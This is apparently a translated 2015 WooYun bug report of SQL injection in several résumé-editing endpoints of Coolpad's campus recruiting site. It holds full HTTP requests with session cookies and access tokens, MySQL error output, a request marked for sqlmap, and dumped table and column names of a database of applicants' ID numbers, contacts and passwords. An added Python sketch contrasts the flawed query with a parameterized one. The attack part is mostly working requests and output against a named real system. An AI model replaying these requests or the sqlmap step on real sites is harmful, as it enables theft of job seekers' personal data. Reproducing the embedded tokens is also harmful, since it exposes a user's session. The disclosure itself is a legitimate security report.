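Bug ID: WooYun-2015-0126495
Vulnerability title: Mobile Industry Security: SQL injection in multiple places at Yulong Communications (Coolpad) (apparently exposing user résumés)
Vendor: yulong.com
Author: DloveJ
Submitted: 2015-07-13 16:49
Disclosed: 2015-08-28 10:00
Vulnerability type: SQL injection
Severity: High
Self-assessed Rank: 15
Status: Confirmed by vendor
Tags:
2015-07-13: Details reported to the vendor; awaiting vendor handling
2015-07-14: Vendor confirmed; details disclosed to the vendor only
2015-07-24: Details disclosed to core white hats and experts in related fields
2015-08-03: Details disclosed to regular white hats
2015-08-13: Details disclosed to intern white hats
2015-08-28: Details disclosed to the public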
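Mobile Industry Security: SQL injection at Yulong Communications (Coolpad) (can expose user résumés)
The injected parameter in every case is `field_coolyunid=`
http://campus.coolpad.com/
Log in and edit the résumé.
Testing showed that the following edit actions are injectable!
0x00 Personal information > Edit > Save > capture the request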
```http
POST /index.php?c=submitResumes&f=savePersonalInfo HTTP/1.1
Host: campus.coolpad.com
Proxy-Connection: keep-alive
Content-Length: 722
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://campus.coolpad.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2438.3 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://campus.coolpad.com/index.php?c=submitResumes&f=resumePreview&act=edit
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: Hm_lvt_cf573ba5889953becfec5b2e08d9160d=1436762927; Hm_lpvt_cf573ba5889953becfec5b2e08d9160d=1436765094; CP_SW_U_Id=cad54902-25ab-4807-b4f6-b9e3ce88e7b5_17wff3; W_CP_T_Id=dt9_1747fb190b-6b19-4213-8a6c-1f85887146e5s1sr; nTalk_CACHE_DATA={uid:kf_9926_ISME9754_guest9C383A1B-A989-99,tid:1436762887533458}; NTKF_T2D_CLIENTID=guest9C383A1B-A989-9977-49BF-7C23C030791A; pgv_pvi=530273280; pgv_si=s2191045632; U_T=null; rememberUserNickName=32564674; isHasLogin=true; shopCart=""; glanceOverGoods=""; Hm_lvt_ed4dc0af212843677141159d85428e45=1436762877,1436768984; Hm_lpvt_ed4dc0af212843677141159d85428e45=1436768988; OZ_1U_1844=vid=v5a342fd662eea.0&ctime=1436768987&ltime=1436768984; OZ_1Y_1844=erefer=http%3A//www.yulong.com/product/product/product/load.html%3FproductBO.product.id%3D6040%26productBO.menuId%3D30&eurl=http%3A//www.coolpad.com/&etime=1436768984&ctime=1436768987&ltime=1436768984&compid=1844; Hm_lvt_384596db34f6f9312806bd8ba87b7dc5=1436762878,1436768985; Hm_lpvt_384596db34f6f9312806bd8ba87b7dc5=1436768988; isMobile=n; datas=%7B%22publish%22%3A%7B%22history%22%3A%5B%22%5C%2Findex.php%3Fc%3DsubmitResumes%26f%3DresumePreview%26act%3Dedit%22%5D%2C%22uid%22%3A32564674%2C%22rtncode%22%3A%220%22%2C%22openid%22%3A%2232564674%22%2C%22expires_in%22%3A%227776000%22%2C%22refresh_token%22%3A%222.e63a865568bd9e287f9f34bef92decc0%22%2C%22access_token%22%3A%222.00534006a7ec55a120825a9584f4cfbb.9185d4279dcfcd5abbe2f50ca80513f4.1436773923100%22%2C%22sex%22%3A%221%22%2C%22email%22%3A%22dongdongxuehei%40163.com%22%2C%22nickname%22%3A%22test%22%2C%22brithday%22%3A%221990-4-5%22%2C%22rtn_code%22%3A%220%22%2C%22headIconUrl%22%3A%22http%3A%5C%2F%5C%2Ffile.coolyun.com%5C%2Fgroup6%5C%2FM06%5C%2FEF%5C%2F1D%5C%2FwKgFFlWjQm-IV6LSAAAAPFVQDX8AAt9pwA9-zoAAABU437.jpg%3Fmethod%3Dgenerate%26type%3Dcrop%26width%3D256%26height%3D256%26quality%3D80%26access_token%3D101CVoAUsqc4DdqemSia8RWgznJq%252FbHKgUmZw%253D%253D%26source%3Dheadimg%26d%3D32564674%26method%3Ddownload%22%2C%22mobile%22%3A%22%22%2C%22uploadToken%22%3A%22923343d9b5cc60459390386fd1f715da%22%7D%7D

field_coolyunid=32564674&field_preview=edit&info%5Bfield_photo%5D=public%2Fuploads%2F2015-07-13%2F14367740192603.jpg&info%5Bfield_realname%5D=%E9%83%BD%E6%98%AF&info%5Bfield_card_type%5D=idcard&info%5Bfield_idcard%5D=110101199609080097&info%5Bfield_sex%5D=gentleman&info%5Bfield_birthday%5D=1996-09-08&info%5Bfield_nation%5D=&info%5Bfield_health%5D=better&info%5Bfield_marital_status%5D=unmarried&info%5Bfield_political_status%5D=members&info%5Bfield_living_city%5D=sad&info%5Bfield_origin_palce%5D=dadad&info%5Bfield_before_colloge_residence%5D=%E5%B7%B4%E9%9F%B3%E9%83%AD%E6%A5%9E%E8%92%99%E5%8F%A4%E8%87%AA%E6%B2%BB%E5%B7%9E&info%5Bfield_graduation_time%5D=2015-01-01&info%5Bfield_height%5D=160&info%5Bfield_weight%5D=0
```
```http
HTTP/1.1 200 OK
Date: Mon, 13 Jul 2015 08:27:31 GMT
Server: nginx/1.6.0
Content-Type: text/html; charset=utf-8
X-Powered-By: PHP/5.5.10
X-Via: 1.1 nmg29:2 (Cdn Cache Server V2.0)
Connection: keep-alive
Content-Length: 899

<strong>A mysql error has occurred!</strong><br />
<strong>Error Number:</strong>1064<br />
<strong>Error Description:</strong>[Execute sql sentence error! SQL :(-) UPDATE `clp_seekers` SET `s_photo`='public/uploads/2015-07-13/14367740192603.jpg' , `s_realname`='齿¯' , `s_card_type`='idcard' , `s_idcard`='110101199609080097' , `s_sex`='gentleman' , `s_birthday`='1996-09-08' , `s_nation`='' , `s_health`='better' , `s_marital_status`='unmarried' , `s_political_status`='members' , `s_living_city`='sad' , `s_origin_palce`='dadad' , `s_before_colloge_residence`='å·´é³éæ¥èå¤èªæ²»å·' , `s_graduation_time`='2015-01-01' , `s_height`='160' , `s_weight`='0' WHERE `coolyun_uid`=32564674' ]:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1<br />
<strong>Error Time:</strong>2015-07-13 16:27:30
```
0x01 Contact details > Edit > Save > capture the request
```http
POST /index.php?c=submitResumes&f=saveConnectInfo HTTP/1.1
Host: campus.coolpad.com
Proxy-Connection: keep-alive
Content-Length: 163
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://campus.coolpad.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2438.3 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://campus.coolpad.com/index.php?c=submitResumes&f=resumePreview&act=edit
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: Hm_lvt_cf573ba5889953becfec5b2e08d9160d=1436762927; Hm_lpvt_cf573ba5889953becfec5b2e08d9160d=1436765094; CP_SW_U_Id=cad54902-25ab-4807-b4f6-b9e3ce88e7b5_17wff3; W_CP_T_Id=dt9_1747fb190b-6b19-4213-8a6c-1f85887146e5s1sr; nTalk_CACHE_DATA={uid:kf_9926_ISME9754_guest9C383A1B-A989-99,tid:1436762887533458}; NTKF_T2D_CLIENTID=guest9C383A1B-A989-9977-49BF-7C23C030791A; pgv_pvi=530273280; pgv_si=s2191045632; U_T=null; rememberUserNickName=32564674; isHasLogin=true; shopCart=""; glanceOverGoods=""; Hm_lvt_ed4dc0af212843677141159d85428e45=1436762877,1436768984; Hm_lpvt_ed4dc0af212843677141159d85428e45=1436768988; OZ_1U_1844=vid=v5a342fd662eea.0&ctime=1436768987&ltime=1436768984; OZ_1Y_1844=erefer=http%3A//www.yulong.com/product/product/product/load.html%3FproductBO.product.id%3D6040%26productBO.menuId%3D30&eurl=http%3A//www.coolpad.com/&etime=1436768984&ctime=1436768987&ltime=1436768984&compid=1844; Hm_lvt_384596db34f6f9312806bd8ba87b7dc5=1436762878,1436768985; Hm_lpvt_384596db34f6f9312806bd8ba87b7dc5=1436768988; isMobile=n; datas=%7B%22publish%22%3A%7B%22history%22%3A%5B%22%5C%2Findex.php%3Fc%3DsubmitResumes%26f%3DresumePreview%26act%3Dedit%22%5D%2C%22uid%22%3A32564674%2C%22rtncode%22%3A%220%22%2C%22openid%22%3A%2232564674%22%2C%22expires_in%22%3A%227776000%22%2C%22refresh_token%22%3A%222.e63a865568bd9e287f9f34bef92decc0%22%2C%22access_token%22%3A%222.00534006a7ec55a120825a9584f4cfbb.9185d4279dcfcd5abbe2f50ca80513f4.1436773923100%22%2C%22sex%22%3A%221%22%2C%22email%22%3A%22dongdongxuehei%40163.com%22%2C%22nickname%22%3A%22test%22%2C%22brithday%22%3A%221990-4-5%22%2C%22rtn_code%22%3A%220%22%2C%22headIconUrl%22%3A%22http%3A%5C%2F%5C%2Ffile.coolyun.com%5C%2Fgroup6%5C%2FM06%5C%2FEF%5C%2F1D%5C%2FwKgFFlWjQm-IV6LSAAAAPFVQDX8AAt9pwA9-zoAAABU437.jpg%3Fmethod%3Dgenerate%26type%3Dcrop%26width%3D256%26height%3D256%26quality%3D80%26access_token%3D101CVoAUsqc4DdqemSia8RWgznJq%252FbHKgUmZw%253D%253D%26source%3Dheadimg%26d%3D32564674%26method%3Ddownload%22%2C%22mobile%22%3A%22%22%2C%22uploadToken%22%3A%229d600576e1f16265f3ab7bbb2fd458ad%22%7D%7D

field_coolyunid=32564674&cont%5Bfield_tel%5D=15099999999&cont%5Bfield_email%5D=sddsa%40qq.com&cont%5Bfield_address%5D=&cont%5Bfield_emergency_number%5D=15988880989
```
```http
HTTP/1.1 200 OK
Date: Mon, 13 Jul 2015 08:29:50 GMT
Server: nginx/1.6.0
Content-Type: text/html; charset=utf-8
X-Powered-By: PHP/5.5.10
X-Via: 1.1 nmg29:2 (Cdn Cache Server V2.0)
Connection: keep-alive
Content-Length: 525

<strong>A mysql error has occurred!</strong><br />
<strong>Error Number:</strong>1064<br />
<strong>Error Description:</strong>[Execute sql sentence error! SQL :(-) UPDATE `clp_seekers` SET `s_tel`='15099999999' , `s_email`='sddsa@qq.com' , `s_address`='' , `s_emergency_number`='15988880989' WHERE `coolyun_uid`=32564674' ]:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1<br />
<strong>Error Time:</strong>2015-07-13 16:29:49
```
0x02 Skills/Hobbies > Edit > Save > capture the request
```http
POST /index.php?c=submitResumes&f=saveSkillsHobbiesInfo HTTP/1.1
Host: campus.coolpad.com
Proxy-Connection: keep-alive
Content-Length: 297
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://campus.coolpad.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2438.3 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://campus.coolpad.com/index.php?c=submitResumes&f=resumePreview&act=edit&r=0.38695669337175786
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: Hm_lvt_cf573ba5889953becfec5b2e08d9160d=1436762927; Hm_lpvt_cf573ba5889953becfec5b2e08d9160d=1436765094; CP_SW_U_Id=cad54902-25ab-4807-b4f6-b9e3ce88e7b5_17wff3; W_CP_T_Id=dt9_1747fb190b-6b19-4213-8a6c-1f85887146e5s1sr; nTalk_CACHE_DATA={uid:kf_9926_ISME9754_guest9C383A1B-A989-99,tid:1436762887533458}; NTKF_T2D_CLIENTID=guest9C383A1B-A989-9977-49BF-7C23C030791A; pgv_pvi=530273280; pgv_si=s2191045632; U_T=null; rememberUserNickName=32564674; isHasLogin=true; shopCart=""; glanceOverGoods=""; Hm_lvt_ed4dc0af212843677141159d85428e45=1436762877,1436768984; Hm_lpvt_ed4dc0af212843677141159d85428e45=1436768988; OZ_1U_1844=vid=v5a342fd662eea.0&ctime=1436768987&ltime=1436768984; OZ_1Y_1844=erefer=http%3A//www.yulong.com/product/product/product/load.html%3FproductBO.product.id%3D6040%26productBO.menuId%3D30&eurl=http%3A//www.coolpad.com/&etime=1436768984&ctime=1436768987&ltime=1436768984&compid=1844; Hm_lvt_384596db34f6f9312806bd8ba87b7dc5=1436762878,1436768985; Hm_lpvt_384596db34f6f9312806bd8ba87b7dc5=1436768988; isMobile=n; datas=%7B%22publish%22%3A%7B%22history%22%3A%5B%22%5C%2Findex.php%3Fc%3DsubmitResumes%26f%3DresumePreview%26act%3Dedit%22%5D%2C%22uid%22%3A32564674%2C%22rtncode%22%3A%220%22%2C%22openid%22%3A%2232564674%22%2C%22expires_in%22%3A%227776000%22%2C%22refresh_token%22%3A%222.e63a865568bd9e287f9f34bef92decc0%22%2C%22access_token%22%3A%222.00534006a7ec55a120825a9584f4cfbb.9185d4279dcfcd5abbe2f50ca80513f4.1436773923100%22%2C%22sex%22%3A%221%22%2C%22email%22%3A%22dongdongxuehei%40163.com%22%2C%22nickname%22%3A%22test%22%2C%22brithday%22%3A%221990-4-5%22%2C%22rtn_code%22%3A%220%22%2C%22headIconUrl%22%3A%22http%3A%5C%2F%5C%2Ffile.coolyun.com%5C%2Fgroup6%5C%2FM06%5C%2FEF%5C%2F1D%5C%2FwKgFFlWjQm-IV6LSAAAAPFVQDX8AAt9pwA9-zoAAABU437.jpg%3Fmethod%3Dgenerate%26type%3Dcrop%26width%3D256%26height%3D256%26quality%3D80%26access_token%3D101CVoAUsqc4DdqemSia8RWgznJq%252FbHKgUmZw%253D%253D%26source%3Dheadimg%26d%3D32564674%26method%3Ddownload%22%2C%22mobile%22%3A%22%22%2C%22uploadToken%22%3A%229d600576e1f16265f3ab7bbb2fd458ad%22%7D%7D

field_coolyunid=32564674&hobb%5Bfield_english_level%5D=cet4&hobb%5Bfield_english_scores%5D=1132&hobb%5Bfield_english_certficate%5D=13&hobb%5Bfield_english_certficate_date%5D=2014-01-01&hobb%5Bfield_english_certficate_scores%5D=123&hobb%5Bfield_other_skills%5D=3&hobb%5Bfield_personal_hobbies%5D=31
```
```http
HTTP/1.1 200 OK
Date: Mon, 13 Jul 2015 08:31:23 GMT
Server: nginx/1.6.0
Content-Type: text/html; charset=utf-8
X-Powered-By: PHP/5.5.10
X-Via: 1.1 nmg29:2 (Cdn Cache Server V2.0)
Connection: keep-alive
Content-Length: 439

<strong>A mysql error has occurred!</strong><br />
<strong>Error Number:</strong>1064<br />
<strong>Error Description:</strong>[Execute sql sentence error! SQL :(-) SELECT COUNT(*) FROM `clp_seekers_skills_hobbies` WHERE `s_id`=32564674' ]:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1<br />
<strong>Error Time:</strong>2015-07-13 16:31:23
```
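The three error responses above share one root cause: `field_coolyunid` reaches the SQL text unquoted, and the failing statement is echoed back to the client. As an added example (not code from the site or from the original report), the sketch below sets that pattern beside a validated, bound query. It uses Python and an in-memory SQLite table as stand-ins for the site's PHP/MySQL stack; the function names, uids and sample rows are constructed.

```python
import logging
import re
import sqlite3

UID_RE = re.compile(r"[0-9]{1,9}")  # coolyun_uid is int(9) in the dumped schema


def make_db():
    """In-memory stand-in for clp_seekers with constructed rows."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE clp_seekers ("
               "coolyun_uid INTEGER PRIMARY KEY, s_tel TEXT, s_email TEXT)")
    db.executemany("INSERT INTO clp_seekers VALUES (?, '', '')",
                   [(1001,), (1002,)])
    return db


def save_contact_vulnerable(db, form):
    """Pattern visible in the error output: values are pasted into the SQL
    text, field_coolyunid without quotes, and failures are echoed back."""
    sql = ("UPDATE clp_seekers SET s_tel='%s', s_email='%s' "
           "WHERE coolyun_uid=%s"
           % (form["tel"], form["email"], form["field_coolyunid"]))
    try:
        db.execute(sql)
        return "ok"
    except sqlite3.Error as exc:
        return "Execute sql sentence error! SQL: %s : %s" % (sql, exc)


def save_contact_hardened(db, form):
    """Validate the id against the column type, bind every value, and keep
    the SQL text and driver error out of the response."""
    uid = form.get("field_coolyunid", "")
    if not UID_RE.fullmatch(uid):
        return "invalid request"
    try:
        cur = db.execute(
            "UPDATE clp_seekers SET s_tel=?, s_email=? WHERE coolyun_uid=?",
            (form["tel"], form["email"], int(uid)))
        db.commit()
    except sqlite3.Error:
        logging.exception("saveConnectInfo failed")  # server-side log only
        return "server error"
    return "ok" if cur.rowcount == 1 else "not found"


if __name__ == "__main__":
    db = make_db()
    # Constructed input: a uid with the trailing quote seen in the responses.
    probe = {"field_coolyunid": "1001'", "tel": "15000000000",
             "email": "a@example.com"}
    print(save_contact_vulnerable(db, probe))
    print(save_contact_hardened(db, probe))
```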
》》》》》I just saw that the vendor confirmed the bug and, unexpectedly, rated it low. I'm not in the mood to write these up one by one, so just run it directly; look up the rest yourselves!!《《《《《
0x03 One of the packets
```http
POST /index.php?c=submitResumes&f=saveConnectInfo HTTP/1.1
Host: campus.coolpad.com
Proxy-Connection: keep-alive
Content-Length: 164
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://campus.coolpad.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2438.3 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://campus.coolpad.com/index.php?c=submitResumes&f=resumePreview&act=edit
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: Hm_lvt_cf573ba5889953becfec5b2e08d9160d=1436762927; Hm_lpvt_cf573ba5889953becfec5b2e08d9160d=1436765094; CP_SW_U_Id=cad54902-25ab-4807-b4f6-b9e3ce88e7b5_17wff3; W_CP_T_Id=dt9_1747fb190b-6b19-4213-8a6c-1f85887146e5s1sr; nTalk_CACHE_DATA={uid:kf_9926_ISME9754_guest9C383A1B-A989-99,tid:1436762887533458}; NTKF_T2D_CLIENTID=guest9C383A1B-A989-9977-49BF-7C23C030791A; pgv_pvi=530273280; pgv_si=s2191045632; U_T=null; rememberUserNickName=32564674; isHasLogin=true; shopCart=""; glanceOverGoods=""; Hm_lvt_ed4dc0af212843677141159d85428e45=1436762877,1436768984; Hm_lpvt_ed4dc0af212843677141159d85428e45=1436768988; OZ_1U_1844=vid=v5a342fd662eea.0&ctime=1436768987&ltime=1436768984; OZ_1Y_1844=erefer=http%3A//www.yulong.com/product/product/product/load.html%3FproductBO.product.id%3D6040%26productBO.menuId%3D30&eurl=http%3A//www.coolpad.com/&etime=1436768984&ctime=1436768987&ltime=1436768984&compid=1844; Hm_lvt_384596db34f6f9312806bd8ba87b7dc5=1436762878,1436768985; Hm_lpvt_384596db34f6f9312806bd8ba87b7dc5=1436768988; isMobile=n; datas=%7B%22publish%22%3A%7B%22history%22%3A%5B%22%5C%2Findex.php%3Fc%3DsubmitResumes%26f%3DresumePreview%26act%3Dedit%22%5D%2C%22uid%22%3A32564674%2C%22rtncode%22%3A%220%22%2C%22openid%22%3A%2232564674%22%2C%22expires_in%22%3A%227776000%22%2C%22refresh_token%22%3A%222.e63a865568bd9e287f9f34bef92decc0%22%2C%22access_token%22%3A%222.00534006a7ec55a120825a9584f4cfbb.9185d4279dcfcd5abbe2f50ca80513f4.1436773923100%22%2C%22sex%22%3A%221%22%2C%22email%22%3A%22dongdongxuehei%40163.com%22%2C%22nickname%22%3A%22test%22%2C%22brithday%22%3A%221990-4-5%22%2C%22rtn_code%22%3A%220%22%2C%22headIconUrl%22%3A%22http%3A%5C%2F%5C%2Ffile.coolyun.com%5C%2Fgroup6%5C%2FM06%5C%2FEF%5C%2F1D%5C%2FwKgFFlWjQm-IV6LSAAAAPFVQDX8AAt9pwA9-zoAAABU437.jpg%3Fmethod%3Dgenerate%26type%3Dcrop%26width%3D256%26height%3D256%26quality%3D80%26access_token%3D101CVoAUsqc4DdqemSia8RWgznJq%252FbHKgUmZw%253D%253D%26source%3Dheadimg%26d%3D32564674%26method%3Ddownload%22%2C%22mobile%22%3A%22%22%7D%7D

field_coolyunid=32564674*&cont%5Bfield_tel%5D=15099999999&cont%5Bfield_email%5D=sddsa%40qq.com&cont%5Bfield_address%5D=&cont%5Bfield_emergency_number%5D=15988880989
```
Hand it to sqlmap
```text
Database: coolpadjobdb
[35 tables]
+---------------------------------+
| clp_college                     |
| clp_college_department          |
| clp_count_position              |
| clp_department                  |
| clp_department_managers         |
| clp_hiring                      |
| clp_hiring_employ               |
| clp_hiring_first                |
| clp_hiring_second               |
| clp_lecture                     |
| clp_managers                    |
| clp_managers_area               |
| clp_position                    |
| clp_position_city               |
| clp_position_interviewarea      |
| clp_position_type               |
| clp_position_workarea           |
| clp_preach_plan                 |
| clp_province                    |
| clp_ranks                       |
| clp_recruit_area                |
| clp_recruitment_dynamics        |
| clp_seekers                     |
| clp_seekers_active              |
| clp_seekers_audition            |
| clp_seekers_behave              |
| clp_seekers_connection          |
| clp_seekers_education           |
| clp_seekers_family_relationship |
| clp_seekers_practice_experience |
| clp_seekers_project_experience  |
| clp_seekers_self_evaluation     |
| clp_seekers_skills_hobbies      |
| statistics_datas                |
| statistics_status               |
+---------------------------------+
```
Database: coolpadjobdb
Table: clp_seekers
[38 columns]

| Column | Type |
|---|---|
| coolyun_uid | int(9) |
| s_address | varchar(420) |
| s_before_colloge_residence | varchar(45) |
| s_birthday | timestamp |
| s_card_type | enum('idcard','other') |
| s_edit_date | datetime |
| s_email | varchar(24) |
| s_emergency_contact | varchar(72) |
| s_emergency_contact_tel | varchar(18) |
| s_emergency_number | varchar(42) |
| s_eng_rank_goal | varchar(12) |
| s_eng_rank_type | enum('CET4','CET6','PETS','IELTS','TOFEL','TEM4','TEM8','BEC','CATTI') |
| s_expect_graduation | timestamp |
| s_graduation_time | datetime |
| s_health | enum('better','nice','bad') |
| s_height | int(4) |
| s_iconb | varchar(420) |
| s_icons | varchar(420) |
| s_id | int(8) |
| s_idcard | varchar(20) |
| s_living_city | varchar(45) |
| s_marital_status | enum('married','unmarried','divorce','secret') |
| s_name | varchar(72) |
| s_nation | varchar(32) |
| s_origin_palce | varchar(128) |
| s_other_eng_rank_goal | varchar(12) |
| s_other_eng_rank_type | enum('CET4','CET6','PETS','IELTS','TOFEL','TEM4','TEM8','BEC','CATTI') |
| s_other_lang_rank | varchar(300) |
| s_password | varchar(32) |
| s_photo | varchar(300) |
| s_political_status | enum('members','party','other') |
| s_portrait | varchar(360) |
| s_realname | varchar(24) |
| s_save_date | datetime |
| s_sex | enum('lady','gentleman') |
| s_tel | varchar(18) |
| s_wechat | varchar(24) |
| s_weight | int(4) |
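What this table represents, I don't know; see for yourselves!
I sat here and wrote all this, so can't you give it a 20? The last one was rated low; is that really okay?
How about a high rating, rank 20?
Severity: High
Vulnerability Rank: 12
Confirmed: 2015-07-14 09:58
Hello, adhering to the principles of fairness and impartiality, we give a reasonably fair assessment of each vulnerability based on the difficulty of discovering it, the difficulty of exploiting it, and the degree of harm it causes. Thank you for your attention to Coolpad security.
None yet
The expert collects cards while posting bugs, ha.
@江苏苏宁易购电子商务有限公司 You're the handsome guy who was handing out shopping cards just now, @@
@江苏苏宁易购电子商务有限公司 I dug up one of your bugs; it hasn't been reviewed yet.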